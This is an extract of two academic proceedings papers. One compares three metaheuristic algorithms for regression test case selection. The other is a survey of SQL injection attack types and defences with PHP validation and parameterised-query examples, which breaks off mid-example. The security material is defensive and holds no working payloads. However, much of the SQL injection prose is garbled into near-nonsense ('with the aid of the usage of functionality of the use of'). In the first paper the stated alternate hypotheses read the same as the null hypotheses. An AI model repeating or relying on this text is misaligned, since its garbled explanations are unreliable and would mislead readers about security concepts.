A Comparative Analysis of Metaheuristic
Algorithms

Abhishek Singh Verma , Ankur Choudhary , and Shailesh Tiwari

Abstract Regression testing is an activity of finding bugs in the modified parts of the
software and releases the software versions timely to avoid further risks. Retesting of
all existing test cases including obsolete and redundant test cases is increasing the cost
and efforts of the overall process. In order to reduce this cost and time, optimization
algorithms are playing a vital role. This paper focuses on the performance analysis of
three recent metaheuristic algorithms: Cuckoo Search, Crow Search Algorithm, and
Harris Hawks Optimization to solve the RTCS problem for selecting the test cases.
Fault coverage and execution time parameters have been selected for performance
evaluation. The experiments are performed and analyzed on standard SIR repository.
The results and statistical tests show that Cuckoo Search and Crow Search Algorithm
significantly give better results for different parameters of RTCS problem than Harris
Hawks Optimization (HHO). The Cuckoo Search outperformed on fault coverage,
and Crow Search Algorithm outperformed on time parameter.

Keywords Regression testing · Optimization · Meta-Heuristics · Regression test


case selection · Cuckoo search · Crow search algorithm · HHO

1 Introduction

The growth and success of any software industry are based on to fulfill the customer’s
requirements and deliver a quality product within the specified time period and in
mentioned budget. So, it is become difficult for industries to meet the everchanging
customer requirement and technology upgradation [1]. Testing is one of the essen-
tial phases of SDLC. Moreover, inefficient testing could lead to major economic

A. S. Verma (B)
Dr. A.P.J. Abdul Kalam Technical University, Lucknow, India
A. S. Verma · A. Choudhary
Sharda University, Greater Noida, India
S. Tiwari
ABES Engineering College, Ghaziabad, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 605
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_49
606 A. S. Verma et al.

losses during the development of any software. There exist different software testing
techniques: Regression testing is one of them. Regression testing plays an important
role in maintenance phase to test the quality of software in every updation cycle.
The test suite size increases as new test cases are added every time after addition
of new functionalities in the existing code. Rerunning entire test suite became time
consuming, sometimes it may take a week or more to perform regression testing [2].
In addition, regression testing generally consumes lots of computing resources [3].
Regression Test Case Selection (RTCS) [4–7] aims to select and run only those test
cases that are affected by the code change. RTCS is one of the most explored approach
of test suite optimization to reduce the efforts and cost of regression testing process.
RTCS is considered as an N-P hard problem. Various artificial intelligence algo-
rithms have already been used to solve this complex and multi-objective problem in a
shorter span of time [8–11]. Being a multi-objective problem, the use of metaheuristic
algorithms to solve RTCS is the most appropriate choice.
This paper focuses on the comparative analysis of three recent metaheuristic
algorithms: Cuckoo Search, Crow Search Algorithm, and Harris Hawks Optimiza-
tion to evaluate the performance of RTCS problem. An empirical study on twelve
subject programs retrieved from Software-artifact Infrastructure Repository (SIR)
[12]. Results are also compared with these adopted metaheuristic algorithms to
check which algorithm performs better and provides most optimized results to cover
maximum number of faults in minimum execution time.
Rest of the paper is organized as follows: Sect. 2 discusses the related work carried
out by previous researchers in the domain of RTCS. Section 3 briefly discusses the
problem statement. Section 4 gives an overview of CS, CSA, and HHO algorithms,
respectively. Section 5 presents experimental design and results obtained. Finally,
Sect. 6 concludes the paper with future scope.

2 Related Work

Nature is rich of resources. Humans get inspired with nature phenomenon.


Researchers take inspirations from it to solve complex engineering problems. The
literature revealed that nature-inspired approaches have also been utilized to solve
Regression Test Case Selection (RTCS) problem. Yoo et al. presented an empirical
study to solve the problem of RTCS with the help of Pareto efficient multi-objective
genetic algorithm [13]. Maia et al. proposed a multi-objective formulation to solve
RTCS problem and explain how to optimize results of RTCS problem with the help
of multi-objective formulation [14]. De Souza et al. improved binary multi-objective
PSO method with catfish effect and utilized this improved approach for structural
and functional test case selection [15]. Narciso et al. have been presented a system-
atic review on test case selection approaches and identified 18 different methods
analyzed from various research papers [16]. Panichella et al. proposed a novel diver-
sity preserving technique used to solve multi-criteria RTCS problems and improve
the performance of multi-objective GA named as Diversity based Genetic Algorithm
Regression Test Case Selection: A Comparative Analysis … 607

(DIV-GA) [17]. Rosero et al. presented an effective survey on regression testing


techniques and identified 31 regression testing techniques published in last 15 years
[18]. Hafez et al. proposed a potential fault cache technique for regression test selec-
tion which performs continuous testing with minimal efforts and the results signify
that this technique is more stable and achieves higher cache hit rates [19]. Kazmi
et al. presented a systematic literature review on effective RTCS techniques and
performed 47 empirical studies considering various parameters [20]. Choudhary
et al. proposed a Pareto-based harmony search optimization algorithm for RTCS
problem and the performance statistically evaluated using two metaheuristic algo-
rithms: Bat and Cuckoo Search [21]. Bajaj et al. presented a literature survey on
various nature-inspired optimization algorithms which have been utilized to solve
regression testing problems and analyzed that GA-based approaches performed better
than other approaches [22]. Agrawal et al. have performed a comprehensive compar-
ison of ACO and Hybrid PSO metaheuristic algorithms to analyzed the performance
for RTCS problem considering execution time and fault coverage as quality parame-
ters [23]. Correia et al. have developed a multi-objective test selection tool (MOTSD)
to reduce the cost of selected subset of tests [24]. Gladston et al. proposed a frame-
work for test case selection using Improvised ACO and rough sets which reduces the
test suite size as well as the cost of the whole process [25]. Agrawal et al. proposed
a safe RTCS approach using a Hybrid WOA and evaluated the results with BA and
ACO-based RTCS approaches and found that HWOA performance is better than
with compared metaheuristic algorithms [26].
The above literature reveals the importance of nature-inspired approach for RTCS
problems. In this paper, the performance of Cuckoo Search, Crow Search Algorithm,
and Harris Hawks Optimization has been utilized to solve RTCS problems. The author
has considered two main parameters in this paper such as total fault coverage and
execution time.

3 Problem Statement: Regression Test Case Selection

The existing large test suites are having some obsolete and redundant test cases as two
or more test cases are used for same faults or for same requirements which increases
the size of test suite. So, it is recommended to minimize the size of test suite [15]. In
this paper, the author has considered two test adequacy criteria: execution time and
total fault coverage of test cases.
Given: Suppose an existing software program denoted by SP and a modified version
of this program is denoted by SP’.The test suite of program SP is represented by
T S = tc1, tc2, tc3, . . . . . . . . . .tcm . Let n ≤ m is a number given, where n represents
size of optimal test suite and m represents the total number of fault count in SP.
608 A. S. Verma et al.

4 Discussion: Metaheuristic Algorithms Used

4.1 Cuckoo Search Algorithm

The Cuckoo Search (CS) was founded in 2009 by Xing Shi Yang [27]. This algorithm
mimics the parasitic behavior of Cuckoo bird and utilized levy flights technique.
Cuckoo bird lay their eggs in the other host bird’s nest and drops host’s bird eggs.
Some host birds either adjust with the cuckoo’s egg or some do not like intruders
and having issues with them. In such case, the host bird drops the cuckoo’s bird eggs
from their nest.
Cuckoo Search (CS) Algorithm works on three basic rules:
1. One cuckoo can lay only one egg at a time and randomly chosen the nest to lay
its egg in the nest.
2. The best nest having the highest quality of eggs will move in the next iteration.
3. There are fixed number host nests. The host bird can identify the cuckoo’s bird
egg with a probability p ∈ [0, 1] [28].

4.2 Crow Search Algorithm

The Crow Search Algorithm (CSA) was founded by Askarzadeh et al. in 2016 [29].
CSA is inspired from the foraging behavior of crow flocks. Each crow hides their
extra food to his hiding space from the other crow flocks [30].
The implementation of Crow Search Algorithm (CSA) is based on concepts
mentioned in the following points:
• Crows are generally found in flocks.
• Crows memorize their food hiding locations.
• Crows will follow other crows in the flock to steal food.
• Crows are very careful against robbery and protect their stores by a probability.

4.3 Harris Hawks Optimization Algorithm

In 2019, Heidari et al. developed a novel nature-inspired optimization algorithm


named as Harris Hawks Optimization (HHO) [31]. The inspiration of the algorithm
is the hunting behavior of Harris Hawk birds. The social behavior followed by hawks
it to track and dive on the prey. According to this algorithm, a group of hawks attack
the rabbit (prey) surprisingly from different directions to catch it. The Harris hawk’s
chase model is very effective in comparison with the escape pattern of the preys. The
Harris hawk’s leader attacks on the targeted prey, follow it and quickly moves out of
sight and other hawks continuously chase the prey. This strategy exhausted the prey,
and finally, the hawk captures the targeted prey. To solve constrained problems, HHO
Regression Test Case Selection: A Comparative Analysis … 609

Fig. 1 Various phases of


HHO [31]

is best suited optimization algorithms to other algorithms. HHO is a global optimizer


which maintains the balance between two phases: Exploitation and Exploration.
Figure 1 represents the various phases of HHO.

5 Experimental Design and Results

In this section, the author has discussed experimental design, results, and performance
analysis of Cuckoo Search (CS), Crow Search Algorithm (CSA), and Harris Hawks
Optimization (HHO) Algorithm to find the optimal solution in terms of total fault
coverage and execution time of RTCS problem. The subsection discusses the research
objectives formed, parameters setting of different metaheuristic approaches, research
hypothesis, and subject programs utilized to evaluate the performance.

5.1 Research Objectives

In this paper following research questions have been formed to evaluate and analyze
the performance of the used algorithms:
RQ1. Find out if there any significant differences in fault coverage capabilities of
three different adopted algorithms for the RTCS problem?
RQ2. Is there any effect of execution time on the performance of the three different
approaches used in the study?
610 A. S. Verma et al.

Table 1 Parameter setting utilized for CS, CSA and HHO


Parameters values for Parameters values for CSA algorithm Parameters Values for
CS algorithm HHO algorithm
No. of Probability Population Awareness Flight No of Population No of
Nests (N) to discover size (N) probability length iterations size (N) iterations
alien egg
by a host
bird
30 0.1 30 0.1 2 500 30 500

5.2 Parameter Setting

The parameter setting utilized for CS, CSA, and HHO on which the whole experiment
is performed are represented in Table 1:

5.3 Research Hypotheses

In order to answer the research questions formed in sub-Sect. 5.1, two research
hypotheses have been formed:
Ho: CS = CSA = HHO.
Ha: CS = CSA = HHO.
Ho: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.
Ha: Overall_Execution_Time of CS = Overall_Execution_Time of CSA =
Overall_Execution_Time of HHO.

5.4 Results and Discussion

In this experiment, these three algorithms are executed 15 times and no. of fault
covered is selected as evaluation parameter on control parameter setting already
discussed in Table 1. The total 500 iteration is considered as stopping criteria in
each run and also analyze the execution time required by each algorithm to catch
maximum no. of faults.
Answer to Research Question1:
In order to answer the Research Question1, we analyzed the mean values of total
fault coverage. Table 2 depicts the marginal means of fault coverage of different
algorithms on different subject programs. The highlighted mean is represented that
the Cuckoo Search (CS) algorithm performs better than the adopted algorithms, i.e.,
Crow Search Algorithm (CSA), and Harris Hawks Optimization (HHO) Algorithm
Regression Test Case Selection: A Comparative Analysis … 611

Table 2 Calculated marginal means of algorithms


Dependent variable: Fault_Cov
Algo Mean Std. Error 95%-Confidence interval
Lower-Bound Upper-Bound
HHO 7.646 0.009 7.628 7.664
CSA 7.678 0.009 7.660 7.696
CS 7.831 0.009 7.814 7.849

Table 3 Tests of between-subjects effects


Two-way ANOVA test conducted on fault coverage (at α = 0.05, confidence interval = 95%)
Source Type-III Sum of squares df Mean Square F Sig
Corrected model 22,128.489a 35 632.243 14,074.406 0.000
Intercept 96,512.356 1 96,512.356 2,148,469.926 0.000
Algo 10.604 2 5.302 118.025 0.000
Subject 22,065.941 11 2005.995 44,655.620 0.000
Algo* Subject 51.944 22 2.361 52.561 0.000
Error 71.156 1584 0.045
Total 118,712.000 1620
Corrected Total 22,199.644 1619

in terms of maximum fault coverage. The tests are performed with the help of SPSS
20 tool and results are represented in Table 2 and Table 3.
To again confirm the same results, a two-way ANOVA test is also performed and
significance value is obtained less than 0.05 with confidence interval 95% shown
in Table 3. The results show that null hypothesis is rejected in favor of alternate
hypothesis. Finally, Fig. 2 shows that the fault coverage capabilities of Cuckoo Search
are better than the other adopted algorithms.
Answer to Research Question 2:
In order to answer the Research Question2, we analyzed the marginal means of
execution time of three different algorithms. Table 4 shows that the mean execution
time of adopted algorithms. The highlighted mean value of execution time shows
that the Crow Search Algorithm (CSA) is significantly lesser than the other adopted
algorithms. In Table 5, a Two-way ANOVA test is conducted to further validate
the achieved results. The results of two-way ANONA test are represented that the
significance value is less than 0.05 which means that null hypothesis is rejected
in favor of alternate hypothesis. So, we state that the performance of Crow Search
Algorithm (CSA) in case of execution time is better than the CS and HHO algorithms.
Fig. 3 shows the estimated marginal means of execution time of adopted algo-
rithms which validate the above achieved results of Tables 4 and 5 that execution
time of CSA is better than the CS and HHO algorithms.
612 A. S. Verma et al.

Fig. 2 Subject program and


Algorithm Performance of
fault coverage

Table 4 Calculated marginal means of algorithms


Dependent variable: Exe_Time
Algo Mean Std. Error 95%-Confidence interval
Lower-bound Upper-bound
HHO 4.090 0.026 4.039 4.141
CSA 0.707 0.026 0.656 0.759
CS 1.681 0.026 1.630 1.732

Table 5 Tests of between-subjects effects


Two-way ANOVA Test conducted on Execution Time (at α = 0.05, confidence interval = 95%)
Source Type-III sum of squares df Mean square F Sig
Corrected Model 3421.280a 35 97.751 267.215 0.000
Intercept 7554.027 1 7554.027 20,649.957 0.000
Algo 3274.750 2 1637.375 4475.986 0.000
Subject 57.655 11 5.241 14.328 0.000
Algo* Subject 88.875 22 4.040 11.043 0.000
Error 579.448 1584 0.366
Total 11,554.756 1620
Corrected Total 4000.729 1619
Regression Test Case Selection: A Comparative Analysis … 613

Fig. 3 Subject program and


algorithm performance of
execution time

6 Conclusion and Future Scope

On the basis of results collected and discussed in Sect. 5.4, the author concludes
the performance of all the adopted metaheuristic algorithms on RTCS. The answers
and results of framed research questions show that while solving RTCS problems
using fault coverage and execution time parameters, the performance of adopted
algorithms is also varying. The results reflets that the fault coverage capabilities of
Cuckoo Search (CS) algorithm are better than the CSA and HHO algorithms, on
other hand, the execution time of Crow Search Algorithm (CSA) is lesser than the
other adopted algorithms. But it is also clear from above results that Harris Hawks
Optimization (HHO) is not suitable to solve RTCS problems as it is not given better
results for both the parameters, i.e., fault coverage and execution time.
In the future, authors will evaluate the performance of other metaheuristic algo-
rithms to solve RTCS multi-objective problems in minimum execution time with
maximum fault coverage. Apart from RTCS problems, the authors can also perform
the comparative analysis of various recent metaheuristic algorithms to evaluate
the performance for Test suite minimization as well as for test case prioritization
problems.

References

1. Vierhauser, M., Rabiser, R., & Grünbacher, P. (2014). A case study on testing, commis-
sioning, and operation of very-large-scale software systems. In 36th International Conference
on Software Engineering, ICSE Companion 2014—Proceedings (pp. 125–134).
614 A. S. Verma et al.

2. Rothermel, G., Untch, R. H., Chu, C., & Harrold, M. J. (1999). Test case prioritization: an
empirical study. In 1999 International Conferences Software Maintenance ICSM99.
3. Zhang, L. (2018). Hybrid regression test selection. In ICSE ’18 40th International Conferences
Software Engineering (pp. 199–209).
4. Rothermel, G., & Harrold, M. J. (1997) A Safe , Efficient Regression Test Selection Technique,
no. 2, pp. 1–35.
5. Harrold, M. J., et al. (2011). Regression test selection for Java software. ACM SIGPLAN Not.,
36(11), 312–326.
6. Briand, L. C., Labiche, Y., & He, S. (2009). Automating regression test selection based on
UML designs. Information and Software Technology, 51(1), 16–30.
7. Orso, A., Shi, N., & Harrold, M. J. (2004) Scaling regression testing to large software systems.
In Proceedings of ACM SIGSOFT Symposium Foundation Software and Engineering (pp. 241–
251).
8. Fister, I., Yang, X. S., Brest, J., & Fister, D. (2013). A brief review of nature-inspired algorithms
for optimization. Elektroteh. Vestnik/Electrotechnical Rev., 80(3), 116–122.
9. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran, M.
(2020). An optimal pruning algorithm of classifier ensembles: dynamic programming approach.
Neural Computer Application, 32(20), 16091–16107.
10. Alweshah, M., Alzubi, O. A., & Alzubi, J. A. (2016). Solving Attribute Reduction Problem
using Wrapper Genetic Programming. International Journal of Computer Science and Network
Security, 16(5), 77–84.
11. Alzubi, O., Alzubi, J., Tedmori, S., Rashaideh, H., & Almomani, O. (2018). Consensus-based
combining method for classifier ensembles. The International Arab Journal of Information
Technology, 15(1), 76–86.
12. Do, H., Elbaum, S., & Rothermel, G. (2005). Supporting controlled experimentation with
testing techniques: An infrastructure and its potential impact. Empirical Software Engineering,
10(4), 405–435.
13. Yoo, S., & Harman, M. (2007) Pareto efficient multi-objective test case selection. In 2007 ACM
International Symposium on Software Testing and Analysis ISSTA’07 (pp. 140–150).
14. Maia, C. L. B., Do Carmo, R. A. F., De Freitas, F. G., De Campos, G. A. L., & De Souza, J.
T. (2009). A Multi-objective approach for the regression test case selection problem. In XLI
Brazilian Symposium Operation Research XLI SBPO 2009 (pp. 1824–1835).
15. De Souza, L. S., & Prud, R. B. C. (2014). Multi-objective test case selection : a study of the
influence of the catfish effect on PSO based strategies. In An. do XV Work. Testes e Tolerância
a Falhas—WTF 2014 (pp. 3–58).
16. Narciso, E. N., Delamaro, M. E., & De Lourdes Dos Santos Nunes, F. (2014). Test case selection:
A systematic literature review. International Journal of Software Engineering and Knowledge
Engineering, 24(4), 653–676.
17. Panichella, A., Oliveto, R., Di Penta, M., & De Lucia, A. (2015). Improving multi-objective
test case selection by injecting diversity in genetic algorithms. IEEE Transactions on Software
Engineering, 41(4), 358–383.
18. Rosero, R. H., Gómez, O. S., & Rodríguez, G. (2016). 15 Years of software regression
testing techniques—A survey. International Journal of Software Engineering and Knowledge
Engineering, 26(5), 675–689.
19. Hafez, S., Elnainay, M., Abougabal, M., & Elshehaby, S. (2016). Potential-fault cache-based
regression test selection. In 2016 IEEE/ACS 13th International Conference of Computer
Systems and Applications (AICCSA) (vol. 0).
20. Kazmi, R., Jawawi, D. N. A., Mohamad, R., & Ghani, I. (2017) Effective regression test case
selection: A systematic literature review. ACM Computing Surveys, 50(2).
21. Choudhary, A., Agrawal, A. P., & Kaur, A. (2018). An effective approach for regression test
case selection using pareto based multi-objective harmony search. In Proceedings of the 11th
International Workshop on Search-Based Software Testing (vol. August, pp. 13–20).
22. Bajaj, A., Sangwan, O. P. (2018). A survey on regression testing using nature-inspired
approaches. In 2018 4th International Conference on Computing Communication and
Automation (ICCCA) (pp. 1–5).
Regression Test Case Selection: A Comparative Analysis … 615

23. Agrawal, A. P., & Kaur, A. (2018). A comprehensive comparison of ant colony and hybrid
particle swarm optimization algorithms through test case selection. Advances in Intelligent
Systems and Computing, 542(August), 397–405.
24. Correia, D., Abreu, R., Santos, P., Nadkarni, J. (2019) MOTSD: A multi-objective test selec-
tion tool using test suite diagnosability. In ESEC/FSE 2019—Proceedings of the 2019 27th
ACM Joint Meeting on European Software Engineering Conference and Symposium on the
Foundations of Software Engineering (no. May, pp. 1070–1074).
25. Gladston, A., & Niranjana Devi, N. (2020). Optimal test case selection using ant colony and
rough sets.International Journal of Applied Evolutionary Computation (IJAEC), 11(2), 1–14.
26. Agrawal, A. P., Choudhary, A., & Kaur, A. (2020). An effective regression test case selection
using hybrid whale optimization algorithm. International Journal of Distributed Systems and
Technologies (IJDST)., 11(1), 53–67.
27. Yang, X., Deb, S., & Behaviour, A. C. B. (2009). Cuckoo Search via L ´ evy Flights. In IEEE,
pp. 210–214.
28. Yang, X. S., & Deb, S. (2010). Engineering optimisation by cuckoo search. International
Journal of Mathematical Modelling and Numerical Optimisation, 1(4), 330–343.
29. Askarzadeh, A. (2016). A novel metaheuristic method for solving constrained engineering
optimization problems: Crow search algorithm. Computers and Structures, 169, 1–12.
30. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & de Albuquerque,
V. H. C. (2020). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications, 32(15), 10915–10925.
31. Heidari, A. A., Mirjalili, S., Faris, H., Aljarah, I., Mafarja, M., & Chen, H. (2019). Harris hawks
optimization: Algorithm and applications. Future Generation Computer Systems, 97(March),
849–872.
A Comprehensive Study on SQL
Injection Attacks, Their Mode, Detection
and Prevention

Sabyasachi Dasmohapatra and Sushree Bibhuprada B. Priyadarshini

Abstract SQL injection indicates the type of attack that exploits vulnerability and
security prevailing in the database systems concerned with any application. This
vulnerability is mostly encountered within web pages having dynamic contents. In
this study, for any kind of vulnerability, we discuss the way how attackers of these
types could get benefit out of such vulnerability and execute vulnerable codes along
with the strategy to countermeasure such negative impacts associated with database
systems. In this context, web operations are commonly employed for online admin-
istrations spanning from high range of informal communication to administering
transaction accounts, while dealing with private user information which is confiden-
tial. However, the underlying problem is that, this information is vulnerable to attacks
owing to unauthorized access, where the attackers avail access into the system through
different hacking and cracking techniques with surprisingly negative intentions. The
attacker can employ some more well-versed queries and some novel strategies to
bypass the authentication while conjointly attaining complete control over the web
application as well as the server. A lot of novel algorithms have been developed
till now to encrypt data query for preventing such attacks by framing desired query
change plan. In this paper, we will be collaborating on the background of injec-
tion attack, types of injection attack, various case studies and preventive measures
associated with SQL injection attack along with a suitable illustration.

Keywords SQL · SQLIA · Injection

1 Introduction to Structured Query Language Injection


(SQLi)

World Wide Web (WWW) undergoes marvelous peregrination within recent few
years. Businesses and government have come to know that web operation can provide
fruitful, well-planned and well-grounded resolution to the challenge of exchanging

S. Dasmohapatra · S. B. B. Priyadarshini (B)


Siksha ‘O’ Anusandhan Deemed to be University, Bhubaneswar, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 617
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_50
618 S. Dasmohapatra and S. B. B. Priyadarshini

the data and managing business in the recent century. However, in the reduction
charge to conduct their applications online or possibly between simple ignorance,
different program corporations overlook or establish analytical safety concern [1].
WWW as a significant extension, but it strikes on expanding the web at the same time.
Therefore, functional safety operation on web implementation and communicating
through them appears to be significant [2]. To assemble correct approach, developers
must have the knowledge that security is a basic element of any software effect
and that protection must be immersed with the software as it is being written [1].
Classification of injection threats with the aid of way of the usage of SQL Injection;
consumer offers these files that are integrated to a Structured Query Language (SQL)
question in a different segment of database. In this phase, consumer’s facts are to
be recognized through SQL queries. SQL instructions are specified by the striker
directly or indirectly connected to the database by the particular exposure. This kind
of threats are unsafe for each web software that receives and records from clients,
and progresses are accompanied by SQL order to an important database [3].
Such an assault may moreover be carried out by including strings of harmful
symbols within statement values within structure otherwise through argumenta-
tive symbols through URL. Injection assaults in many stipulations receive bene-
fits of mistaken authentication through input/output information. Structured Query
Language Injection Attack (SQLIA) is a kind of query that injects codes that involves
injection of harmful SQL directions with the aid of ability of entered records
through patron to the utility which are thereafter surpassed for occasion of the
database for execution and with the purpose to have an impact on the performance of
default SQL guidelines [2]. There are various techniques that a web-designer/system-
administrator can provide up and contradictory results and assaults get assembled in
their systems. These strategies are used by a developer otherwise computer adminis-
trator makes use of top-notch strategies in enchantment cycle of utility which includes
use of parameterized codes, recent benefit, high-quality account, personalized error
note, etc., [2].
However, these strategies proceed to be the wonderful way to prevent SQL injec-
tion vulnerabilities. These kinds of methods are inclined to human blunders and are
no longer like fastidiously and honestly utilized as computerized methods. Although
maximum developers try to develop carefully the codes pertaining to websites, this is
challenging to defend developing the methods cautiously and successfully to every
resource of insertion. As a result, developers counseled a fluctuation of strategies and
techniques to aid developers and make up for fault within software program utility
of defensive coding. These strategies make use of static, dynamic or hybrid assess-
ment for detecting SQLIA. For example, as shown Fig. 1, an attacker for validation
normally gets in to a textual dialog box on online form by typing their username
and password to bypass the data-base security system by making the statement true
[4–6].
Moreover, additionally there are exceptional methods for opposing to SQLIA that
we specified in the rest of this paper. At the end, in this topic, SQL is geared up as given
in this paper. We start with the aid of way of motivating vulnerability thoughts and
introducing SQL injection attacks. Also, we are going to inquire existing taxonomy
A Comprehensive Study on SQL Injection Attacks … 619

Fig. 1 SQL injection


strategy

of SQL fraud avoidance and identification point of view. We think and judge distinct
SQLIA opposing strategies and signify their distribution needs. At last, a speedy
resolution of this paper is given. Table 1 illustrates the vulnerabilities encountered
in various web applications.

1.1 Gathering Some Knowledge of Vulnerability and SQL


Injection

Vulnerability is a prone spot within utility that can be a graph flaw or a develop-
ment fault. A web-striker can misuse this kind of vulnerabilities, for stealing indi-
vidual/company data. This kind of strike, broken authentication, cross-site scripting
(XSS), session management and cross-site request forgery (CSRF) are few program-
ming level vulnerabilities focused on maximum modern-day internet utility [1–10].
According to reviews that are furnished via the usage of ability of OWASP [5] and
WHID [6], they are striking SQLIA and XSS which are quite usual. SQLIA is taken
into consideration as excessive of assault striking personal data, stability and vacancy
of data. SQLI vulnerability is a kind of assaults providing SQL codes to an internet
structure entering container to achieve proper entry for adjusting data. Using this
vulnerability, an attacker may additionally choose to ship his instructions straight
away to web software and to smash overall performance. SQLI attack could be
labeled to five indispensable instructions based upon totally vulnerabilities within
web functions. This categorization is explained in Table 1 [7–10].
620 S. Dasmohapatra and S. B. B. Priyadarshini

Table 1 SQLIA categorization of vulnerability


Vulnerability Quick information
Bypassing web application authentication It is the best standard utilization taken overbuy
the strikers to skip authentication process, given
in web functions. Through this kind of raid,
striker gives an input discipline, which is
executed and bypass the application
Getting knowledge of database fingerprinting This kind assault is regarded as pre-attack
teaching with the beneficial useful resource of
the utilization of way of way of normal
performance of the use of an attacker. This
classification of assault is carried out thru doable
of coming into some inputs with the aid of the
usage of functionality of the use of which, it
creates an unlawful or the rationally unsuitable
codes. Error notes expose the names of the tables
and the columns. Striker in addition comes to
apprehend about the software program software
utility software program database used in the
back-end server
Injection with UNION query In this kind of strike, striker pulls out documents
from a desk which is from the one that was once
as soon as supposed in the web utility with the
useful resource of the way of the programmer.
An assaulter gives an inclined code to alternate
the data set limit again for a base code
Damaging with additional injected query This is a kind of classification of assault that is
typically very hazardous. Striker enters to the
web application that means a supplementary
inserted codes are produced with real function
Remote execution of stored procedures This form of strike is taken care by executing
ways, saved before through the online function
programmer. This category of assault is carried
out with the aid of executing the procedures,
saved till now by way of the net application
developer

2 Categories of SQL Injection Attack

Different information documents suggest that more than 40,000 assaults per day
give threats to the true world, so it is a massive hassle that wants some codes which
vary in functions. Now a day, many web programs are using databases for saving
the facts wished for the web applications points’ activity, as special as patron needs,
non-public data, sensitive financial archives and many others in one of a shape fields,
from finance and government to social network. All are gathering a range of utilized
sciences, thus approving programmers to develop web application for merchandise
A Comprehensive Study on SQL Injection Attacks … 621

Table 2 Kinds of SQLIA


Kinds of strike Functionality approach
Tautology It is a type of strike in which status belongs to forever true
Logically incorrect query This attack lets an attacker to get information about the back-end
database of a web application using error message
Stored procedure Built-in stored procedure is used with malicious SQL injection
codes
Union query UNION keyword is used to get information by joining the injected
query with safe query
Piggy-backed queries Additional malicious queries are inserted into an original injected
query

fascinating and beneficial of customers (e.g., e-shop, net banking). Table 2 describes
the types of SQL Injection Attack.

3 Prevention System

Researchers have proposed a variety of techniques to tackle SQLIA issues. Finding


and prohibition methods are categorized into two categories. Initial step is to be
aware of SQLIA by reviewing malicious SQL codes system, the usage of sequence
equating, sample and question handling [8]. Another method makes use of informa-
tion dependencies among facts and objects that are tons fewer reasonable to alternate
for determining wicked data server [8]. Different analysts suggest to the developers
to make some new schemes to mining the strings and detect malicious strings to
prevent them from execution [8]. This reduces the malicious entry of the codes to
minimize the vulnerability [6, 11, 12].
The treatment protection troubles are associated to enter verification, William [9]
recommended SQLIA avoidance occupying on powerful stain [9]. Any safety device
does no longer will end up splendid until and until its effectiveness is evaluated by
using the true time environment. To defend web application counter to SQLI strike,
security has been provided as shown in Fig. 2 using these methods. When striker
is going through the web page by using SQLIA, he sorts exquisite request to the
server. Because of this prevention machine has verification controller. These kinds
of methods are filtering the customer inputs which generates malicious requests [13,
14].
The first approach to do so is translating specialized strings to HTML characters.
Other approaches work with common expressions and exceptions.
622 S. Dasmohapatra and S. B. B. Priyadarshini

Fig. 2 Interruption technique scenario

3.1 Log in Time Verification

Verification system proposed at validating either or no longer the sort of enter


suggested through a customer is granted. Real-time verification should take in some
conditions like: format, length of the inputted string, etc. Which string will pass the
verification process that should be allowed for further validation is also considered?
This method is used to counteract the strings entered by the customer. Through these
methods, we can be saying that, who is opening the door without any authentication
[11]. Verification should have following conditions to validate irregular methods of
authentication:
• We should have to whitelist the particular strings for the structured fields to make
sure study enter verification.
• Also, for the verification of constant like radio button, etc., are considered. We
have to use different validation methods to easily break down the malicious input
data.
• The code illustrated in Fig. 3 shows how to prevent table name verification attack:
After this kind of process, Table name will be validated—now the table name will
be legal and can’t be stroked by the attacker [11]. Another issue is in the drop-down
form through which an attacker can easily bypass the data in a table. Let’s assume
if a user gets some ratings from 1 to 5, a user should have to pick from 1 to 5, and
hence, we have to write the PHP code as shown in Fig. 4.
Information which is collected from out side’s should be verified. This rule should
be for everyone who will be going to use this process on web pages. These carriers
A Comprehensive Study on SQL Injection Attacks … 623

switch ($TableName) {
case 'fooTable': return true;
case 'barTable': return true;
default: return new
ErrorDataException('unexpected value provided as table name');
}

Fig. 3 Preventing Table name verification attack

<?php
if(isset($_POST["selRating"]))
{
$number = $_POST["selRating"];
if((is_numeric($number)) && ($number > 0) &&

($number < 6))


{
echo "Selected rating: " . $number;
}
else
echo "The rating has to be a number between 1 and 5!";

Fig. 4 PHP Code for Drop-down Technique

may also desire to be beneath an assault and send malformed records even besides
their knowledge [10, 11].

3.2 Parametrized Query

This kind of method has some capability to compile the query before the execution of
the provided SQL codes. This approach understands the inputted codes and validates
with the database to get in to the server authentically [11]. Customer has entered some
furnished data to validate the authentication process. This kind of coding helps to
find SQLIA. It can be done by using some this kind of queries of MySQLI branch.
Currently, PHP 5.1 is now an upgraded version for this kind of MySQLI database
to prevent the injection attack. PHP Data Objects (PDO) carries out some strategies
which clarify the usage of this kind of query. However, PDO designs the codes to its
simplest form to be operated by different data servers like MySQL, etc., [8–11]. The
PHP code for parameterized query is illustrated in Fig. 5.
624 S. Dasmohapatra and S. B. B. Priyadarshini

<?php
$id = $_GET['id'];
$database_connection = new
PDO('mysql:host=localhost;dbname=sql_injection_exampl
e', 'dbuser', 'dbpasswd');
//preparing the query
$sql = "SELECT username FROM users WHERE id = :id";
$queries = $database_connection->prepare($sql);
$queries->bindParam(':id', $id);
$queries->execute();
//getting the result
$queries->setFetchMode(PDO::FETCH_ASSOC);
$result = $queries->fetchColumn();
print(htmlentities($result));

Fig. 5 PHP code for parameterized query

3.3 Stored Procedures

This method is used by the developer to make more than one group. Transact-SQL
query is used with logical segments to get some execution methods. This procedure
is always saved as named objects in the MySQL data server. In any kind of event, we
want to execute some codes that should be simplified by the stored procedure and
verify the same. The technique mentioned below is an example of stored procedure,
where we create a table using the stored procedure (Fig. 6).
Let’s consider here is an employer who wants to gather some information about
the salary from. In the beginning, we have to create a user named ‘examp’ as follows:
CREATE USER ’examp’@’localhost’ IDENTIFIED BY ’mypassword’;
